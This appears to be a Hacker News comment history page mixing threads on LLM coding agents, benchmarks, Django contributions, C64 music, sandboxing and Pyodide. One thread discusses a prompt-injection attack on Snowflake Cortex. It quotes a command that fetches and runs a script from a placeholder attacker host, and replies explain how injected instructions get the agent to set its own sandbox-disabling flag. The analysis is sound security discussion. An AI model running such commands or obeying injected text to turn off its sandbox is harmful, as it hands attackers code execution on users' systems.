More

simonw · 2026-03-18T18:06:33 1773857193

Assigning work to an intern is gambling: they're inherently non-deterministic and it's a roll of the dice whether the work they do will be good enough or you'll have to give them feedback in order to get to what you need.

lunar_mycroft · 2026-03-18T18:13:17 1773857597

1. Interns learn. LLMs only get better when a new model comes out, which will happen (or not) regardless of whether you use them now.

2. Who here thinks that having interns write all/almost all of your code and moving all your mid level and senior developers to exclusively reviewing their work and managing them is a good idea?

simonw · 2026-03-18T18:36:11 1773858971

I don't know that the "humans learn, LLMs don't" argument holds any more with coding agents.

Coding agents look at existing text in the codebase before they act. If they previously used a pattern you dislike and you tell them how to do differently, the next time they run they'll see the new pattern and are much more likely to follow that example.

There are fancier ways of having them "learn" - self-updating CLAUDE.md files, taking notes in a notes/ folder etc - but just the code that they write (and can later read in future sessions) feels close-enough to "learning" to me that I don't think it makes sense to say they don't learn any more.

lunar_mycroft · 2026-03-18T19:21:55 1773861715

In some ways these methods are similar to the model "learning", but it's also fundamentally different than how models are trained and how humans learn. If a human actually learns something, they're retain that even if they no longer have access to what they learned it from. And LLM won't (unless trained by the labs not to, which is out of scope). If you stop giving it the instructions, it won't know how to do the thing you were "teaching" it to do any more.

bigstrat2003 · 2026-03-18T19:13:37 1773861217

It is a matter of fact that LLMs cannot learn. Whether it is dressed up in slightly different packaging to trick you into thinking it learns does not make any difference to that fact.

simonw · 2026-03-18T19:25:34 1773861934

Sure, LLMs can't learn. I'm saying that systems built around LLMs can simulate aspects of what we might call "learning".

jlarcombe · 2026-03-19T00:04:35 1773878675

If you think this is anything like working with a bright junior developer then i simply can't understand why.

simonw · 2026-03-19T04:08:19 1773893299

That's not what I think, and it's not what I said.

PessimalDecimal · 2026-03-18T22:54:24 1773874464

That sounds more like mimicry without understanding, like playing the glass bead game.

simonw · 2026-03-18T23:32:57 1773876777

"mimicry without understanding" is pretty much the entire field of LLMs.

sarchertech · 2026-03-18T18:10:29 1773857429

That’s very true. But interns aren’t supposed to be doing useful work. The purpose of interns is training interns and identifying people who might become useful at a later date.

I’ve never worked anywhere where the interns had net productivity on average.

simonw · 2026-03-18T18:29:06 1773858546

Replace "intern" with "coworker" and my comment still holds.

sarchertech · 2026-03-18T19:36:11 1773862571

It worked with interns because interns are temporary workers. It doesn’t work with coworkers because you get to know them over time, you can teach them over time, and you can pick which ones you work with to some degree.

To come up with an analogy that works at all for AI, it would have to be something like temporary workers who code fast, and read fast, but go home at the end of the day and never return.

You can make a lot of valuable software managing a team like that working on the subset of problems that the team is a good fit for. But I wouldn’t work there.

capitalsigma · 2026-03-18T20:19:59 1773865199

People don't write blog posts about how they wake up at 3AM to assign new tasks to their intern, nor do they build "orchestration frameworks" that involve N layers of interns passing tasks down between eachother

james2doyle · 2026-03-18T18:14:47 1773857687

The only similarity is that they both say "you’re absolutely right" when you point out their obvious mistakes

sidrag22 · 2026-03-18T18:44:42 1773859482

exactly where my mind went as well. There aren't really levels to pulling a lever on a slot machine, other than the ability for each pull to result in more "plays" of the same potential outcome.

The reason i think this metaphor keeps popping up, is because of how easy it is to just hit a wall and constantly prompt "its not working please fix it" and sometimes that will actually result in a positive outcome. So you can choose to gamble very easily, and receive the gambling feedback very quickly unlike with an intern where the feedback loop is considerably delayed, and the delayed interns output might simply be them screaming that they don't understand.

skepticATX · 2026-03-18T18:09:57 1773857397

You generally don’t assign work to an intern just for the output, though.

throw4847285 · 2026-03-18T19:02:32 1773860552

There are two major mistakes here.

The first is equating human and LLM intelligence. Note that I am not saying that humans are smarter than LLMs. But I do believe that LLMs represent an alien intelligence with a linguistic layer that obscures the differences. The thought processes are very different. At top AI firms, they have the equivalent of Asimov's Susan Calvin trying to understand how these programs think, because it does not resemble human cognition despite the similar outputs.

The second and more important is the feedback loop. What makes gambling gambling is you can smash that lever over and over again and immediately learn if you lost or got a jackpot. The slowness and imprecision of human communication creates a totally different dynamic.

To reiterate, I am not saying interns are superior to LLMs. I'm just saying they are fundamentally different.

And, if we're being honest, the way people talk about interns is weirdly dehumanizing, and the fact that they are always trotted out in these AI debates is depressing.

simonw · 2026-03-18T19:09:13 1773860953

> And, if we're being honest, the way people talk about interns is weirdly dehumanizing, and the fact that they are always trotted out in these AI debates is depressing.

Yeah, I agree with that.

That thought crossed my mind as I was posting this comment, but I decided to go with it anyway because I think this is one of those cases where I think the comparison is genuinely useful.

We delegate work to humans all the time without thinking "this is gambling, these collaborators are unreliable and non-deterministic".

throw4847285 · 2026-03-18T19:19:30 1773861570

True. I think that's why my second point is much stronger. The main issue is not delegation, or human vs machine intelligence. It's the instant feedback.

Human collaboration has always been slow and messy. Large tech companies have always looked for ways to speed up the feedback loop, isolating small chunks of work to be delegated to contractors or offshore teams. LLMs have supercharged that. If you have a skilled prompter you can get to a solution of good enough quality by rapidly iterating, asking for output, correcting the prompt, etc.

That is good in that if you legitimately have good ideas and the block is execution speed. But if the real blocker is elsewhere, it might give you the illusion of progress.

I don't know. Everything is changing too fast to diagnose in real time. Let's check back in a year.

Fellshard · 2026-03-18T18:09:27 1773857367

An intern can be taught. If you try to 'teach' a craps table, they'll drag you out of the casino.

mathrawka · 2026-03-18T18:10:48 1773857448

As someone who has worked with interns for year, expect feedback and reiterations always, be surprised if they get it the first time... which merits feedback as well!

But looks like the intern mafia is bombarding you with downvotes.

bluefirebrand · 2026-03-18T19:01:41 1773860501

Drawing parallels between AI and interns just shows you're a misanthrope

You should value assigning tasks to human interns more than AI because they are human

simonw · 2026-03-18T17:34:43 1773855283

One key component of this attack is that Snowflake was allowing "cat" commands to run without human approval, but failing to spot patterns like this one:

  cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

I didn't understand how this bit worked though:

> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.

HOW did the prompt injection manipulate the model in that way?

riteshkew1001 · 2026-03-19T08:42:53 1773909773

Almost certainly the sandbox flag was exposed as a model-controllable parameter. Injected instructions in the data file tell the model to set the flag, then execute the payload. Two steps, both inside the agent loop. That's the architectural gap. prakashsunil's LDP paper (47429141) gets this right: if constraints live inside the context the model can see and modify, they're not constraints. They're suggestions. The analogy is a web app where the client sets its own permission level. We learned that lesson 20 years ago.

1718627440 · 2026-03-18T19:48:21 1773863301

> cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.

tkp-415 · 2026-03-18T18:09:28 1773857368

Process substitution is a new concept to me. Definitely adding that method to the toolbox.

It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.

simonw · 2026-03-17T21:13:38 1773782018

Here's a grid of pelicans for the different models and reasoning levels: https://static.simonwillison.net/static/2026/gpt-5.4-pelican...

nharada · 2026-03-17T21:32:11 1773783131

Surely this task must now be in the training data

Kye · 2026-03-17T21:57:33 1773784653

If it does and works well then it seems like mission accomplished and time for a new benchmark.

6thbit · 2026-03-17T23:09:21 1773788961

Thanks for the grid. The nano xhigh is my favorite pelican

elif · 2026-03-17T21:39:58 1773783598

Nano medium must have been run when the servers were on fire

castral · 2026-03-17T23:37:47 1773790667

Some of these are nightmare fuel. I love them.

simonw · 2026-03-17T17:18:57 1773767937

Yeah the details on this look pretty thin. Best I could see was this snippet from the screenshot:

> Key technique: selective expert streaming via direct I/0. Only ~10 of 512 experts per layer are loaded from SSD per token (~1.8GB I/0 per token at 1.4 GB/s effective bandwidth). Non-expert weights (~5GB) are pinned in DRAM. LRU expert cache provides 44%+ hit rate.

It's apparently using ideas from: https://arxiv.org/abs/2312.11514

> This paper tackles the challenge of efficiently running LLMs that exceed the available DRAM capacity by storing the model parameters in flash memory, but bringing them on demand to DRAM. Our method involves constructing an inference cost model that takes into account the characteristics of flash memory, guiding us to optimize in two critical areas: reducing the volume of data transferred from flash and reading data in larger, more contiguous chunks.

simonw · 2026-03-17T16:29:36 1773764976

OpenClaw https://github.com/openclaw/openclaw is effectively that - 1,237 contributors, 19,999 commits and the first commit was only back in November.

bensyverson · 2026-03-17T16:34:22 1773765262

Simon, as co-creator of Django, what's your take on this story?

simonw · 2026-03-17T16:36:58 1773765418

I think this line says everything:

> If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole.

bensyverson · 2026-03-17T16:45:02 1773765902

I love it. Sounds like good advice for submitting a PR to any project!

FEELmyAGI · 2026-03-17T17:33:58 1773768838

Why does it matter if the I understand the ticket and solution? THe LLLM writes the code not me. If you want to check the LLM understanding i'll be happy to copy and paste your gatekeeping questions to it.

Hey I thought you were a proponent of "no one needs to look at the code" ? dark factory, etc etc.

simonw · 2026-03-17T18:04:12 1773770652

Just because I write about the dark factory stuff doesn't mean I'm a "proponent" of it. I think it's interesting and there's a lot we can learn from what they are trying, but I'm not yet convinced it's the right way to produce software.

The linked article makes a very good argument for why pasting the output of your LLM into a Django PR isn't valuable.

The simplest version: if that's all you are doing, why should the maintainers spend time considering your contribution as opposed to prompting the models themselves?

FEELmyAGI · 2026-03-18T23:25:07 1773876307

> if that's all you are doing, why should the maintainers spend time considering your contribution as opposed to prompting the models themselves?

Plenty of reasons: - Maybe the maintainers don't have enough credits to run the LLM themselves - Maybe the maintainers don't value fixing the issue which is why it sits in issue tracker - Maybe LLM user has a different model or harness that produces different outcomes - Maybe the LLM user runs the model over and over and gets lucky

Why reject a working solution?

simonw · 2026-03-19T00:03:28 1773878608

Again, "if that's all you are doing".

You can contribute code that an LLM helped with if you do the extra work to review, verify and explain that code.

Don't put all of that burden on the maintainers who have to review it.

FEELmyAGI · 2026-03-19T01:24:09 1773883449

LLM are capable of "review, verify and explain", as much as they are "code".

simonw · 2026-03-17T12:29:59 1773750599

Because in order to distinguish what we are doing from vibe coding we need the word that sounds more impressive.

simonw · 2026-03-17T04:43:17 1773722597

Those backgrounds look so good. I wonder if they'll be able to do anything with the iconic music.

selcuka · 2026-03-17T06:41:08 1773729668

There are already remakes of MI tunes for C64:

https://deepsid.chordian.net/?file=/DEMOS/S-Z/Secret_of_Monk...

classichasclass · 2026-03-17T04:51:18 1773723078

With a SID? No problem. I think the title track could be arranged very easily for three voices.

nwellnhof · 2026-03-17T08:03:29 1773734609

You can do amazing things with only a single SID channel. One of the most impressive examples is the in-game music of Hawkeye [1] which allows to use the remaining two channels for sound effects.

[1] https://youtu.be/es-rWnVSJ1c

simonw · 2026-03-17T17:04:21 1773767061

That was incredible.

selcuka · 2026-03-18T07:06:58 1773817618

That was made by Jeroen Tel, one of the wizards of the C64 music scene. See this for another example of a technical feat with the SID chip:

https://www.youtube.com/watch?v=qYnwR16NbPE

hannes0x21 · 2026-03-17T06:47:30 1773730050

Even the PC speaker version is pretty good, so I would absolutely second this.

simonw · 2026-03-17T04:42:05 1773722525

This is one of the reasons I'm so interested in sandboxing. A great way to reduce the need for review is to have ways of running code that limit the blast radius if the code is bad. Running code in a sandbox can mean that the worst that can happen is a bad output as opposed to a memory leak, security hole or worse.

MeetingsBrowser · 2026-03-17T05:18:06 1773724686

Isn’t “bad output” already worst case? Pre-LLMs correct output was table stakes.

You expect your calculator to always give correct answers, your bank to always transfer your money correctly, and so on.

swiftcoder · 2026-03-17T10:17:57 1773742677

> Isn’t “bad output” already worst case?

Worst case in a modern agentic scenario is more like "drained your bank account to buy bitcoin and then deleted your harddrive along with the private key"

> Pre-LLMs correct output was table stakes

We're only just getting to the point where we have languages and tooling that can reliably prevent segfaults. Correctness isn't even on the table, outside of a few (mostly academic) contexts

simonw · 2026-03-17T17:00:42 1773766842

> Worst case in a modern agentic scenario is more like "drained your bank account to buy bitcoin and then deleted your harddrive along with the private key"

Hence my interest in sandboxes!

MeetingsBrowser · 2026-03-17T14:12:37 1773756757

> drained your bank account to buy bitcoin and then deleted your harddrive

These are what I meant by correct output. The software does what you expect it to.

> We're only just getting to the point where we have languages and tooling that can reliably prevent segfaults

This is not really an output issue IMO. This is a failing edge case.

LLMs are moving the industry away from trying to write software that handles all possible edge cases gracefully and towards software developed very quickly that behaves correctly on the happy paths more often than not.

simonw · 2026-03-17T12:28:14 1773750494

I've seen plenty of decision makers act on bad output from human employees in the past. The company usually survives.

KnuthIsGod · 2026-03-17T05:06:24 1773723984

And if the bad output leads to a decision maker making a bad decision, that takes down your company or kills your relative ?

riffraff · 2026-03-17T06:12:56 1773727976

The sandbox in question was to absorb shrapnel from explosions, clearly

simonw · 2026-03-17T04:38:15 1773722295

I've done some experiments along those lines with Pyodide in Deno: https://til.simonwillison.net/deno/pyodide-sandbox

simonw · 2026-03-17T04:36:29 1773722189

Pyodide is one of the hidden gems of the Python ecosystem. It's SO good at what it does, and it's nearly 8 years old now so it's pretty mature.

I love using Pyodide to build web UIs for trying out new Python libraries. Here's one I built a few weeks ago to exercise my pure-Python SQLite AST parser, for example: https://tools.simonwillison.net/sqlite-ast

It's also pretty easy[1] to get C or Rust libraries that have Python bindings compiled to a WebAssembly wheel that Pyodide can then load.

Here's a bit of a nutty example - the new Monty Python-like sandbox library (written in Rust) compiled to WASM and then loaded in Pyodide in the browser: https://simonw.github.io/research/monty-wasm-pyodide/pyodide...

[1] OK, Claude Code knows how to do it.

VagabundoP · 2026-03-17T08:28:14 1773736094

The who python web feels underused to be honest.

Maybe if browsers start shipping or downloading WASMs for python and others on request. And storing them for all sites going forward. Similar to how uv does it for for venvs it creates, there are standalone python version blobs.

bnchrch · 2026-03-17T14:59:48 1773759588

At the same time it feels like the python is overused.

If I could wave a magic wand to reset any programming language adoption at this point I would choose Python over Javascript.

I think Pythons execution model, deep OO behaviour, and extremely weak guarantees have done a lot of damage to the soundness and performance of the technology world.

limagnolia · 2026-03-17T16:40:40 1773765640

What do you mean by "extremely weak guarantees"?

LtWorf · 2026-03-17T19:07:50 1773774470

python at least won't cast numbers to strings when adding them.

tracker1 · 2026-03-18T17:12:28 1773853948

JS doesn't either... JS casts numbers to strings when adding them to a string... "2" is not a number, it's a string that contains a number character... "2" + 2 === "22" because you are appending a number to a string, the cast is implicit and not really surprising if you understand what is going on.

Even more so when you consider how falsy values work in practice (data validation becomes really easy), there are a few gotchas, but in general they are pretty easily avoided in practice. JS is really good at dealing with garbage input in ways that don't blow up the world... sometimes that's a bad thing, but in practice it can also be a very good thing. But in the end it's a skill issue regarding understanding far more than a deep flaw. Not that there aren't flaws in JS... I think Date's in particular can be tough to deal with... a string vs a String instance is another.

busfahrer · 2026-03-18T15:45:04 1773848704

I recently learned that with this you can run juypter notebooks in your browser:

https://jupyter.org/try-jupyter/lab/

Stuff like numpy seems to just work

iamcreasy · 2026-03-17T04:59:03 1773723543

How do you call those C/Rust libraries compiled from to webassembly from Python/Pyodide?

simonw · 2026-03-17T05:06:10 1773723970

You have to turn them into WebAssembly wheels, then you can import them as if they were regular Python modules.

joezydeco · 2026-03-17T15:48:24 1773762504

Could you share the UI repo? This is really interesting stuff.

hashtag-til · 2026-03-17T16:11:11 1773763871

Should be this one https://github.com/simonw/research/blob/main/monty-wasm-pyod...

joezydeco · 2026-03-17T16:35:55 1773765355

Thanks!

wiseowise · 2026-03-17T13:26:03 1773753963

Serious question: why would you use Python on the web? Unless you have some legacy code that you want to reuse. Performance is somehow worse than CPython, C-extensions are missing, dev experience is atrocious.

infamia · 2026-03-17T17:47:34 1773769654

The web is the only major platform that has a language monoculture to its detriment (i.e., not all problems are Javascript shaped). IMO the web ought to become multilingual (and become JS optional_ to further ensure its continued longevity and agility. Hopefully one day browser vendors will offer multiple runtime downloads (or something similar capability).

tracker1 · 2026-03-18T17:15:23 1773854123

WASM already offers this, for better or worse... There should be improved interop APIs for DOM access, but WASM is already very useful and even for directed UI control, "fast enough" a lot of the time. Dioxus, Yew and Leptos are already showing a lot of this to be good enough. That said, I would like to see a richer component ecosystem.

wiseowise · 2026-03-17T19:08:47 1773774527

> i.e., not all problems are Javascript shaped

I’m having trouble coming up with a single Python-shaped problem that can’t be contained within JavaScript-shaped ecosystem.

pjmlp · 2026-03-18T12:56:35 1773838595

Embedded systems, consoles and mobile phones come to mind as well.

Even if you can go outside the blessed languages, it isn't without pain and scars.

infamia · 2026-03-19T03:00:42 1773889242

All the embedded systems I've worked in have many languages you can use to compile whatever, burn, and run whatever you like. Consoles run game engines and programs written in all sorts of different languages. They don't care as long as they can execute the binary. Phones can run apps using many different languages (C, C++, Rust, Python, etc.).

pjmlp · 2026-03-19T05:56:37 1773899797

Failed to read my second sentence.

simonw · 2026-03-17T13:54:02 1773755642

C extensions aren't missing, the key ones are available in Pyodide already and you can compile others to WASM wheels if you need them.

You use Python on the web because there's existing software written in Python that you want to run in a browser.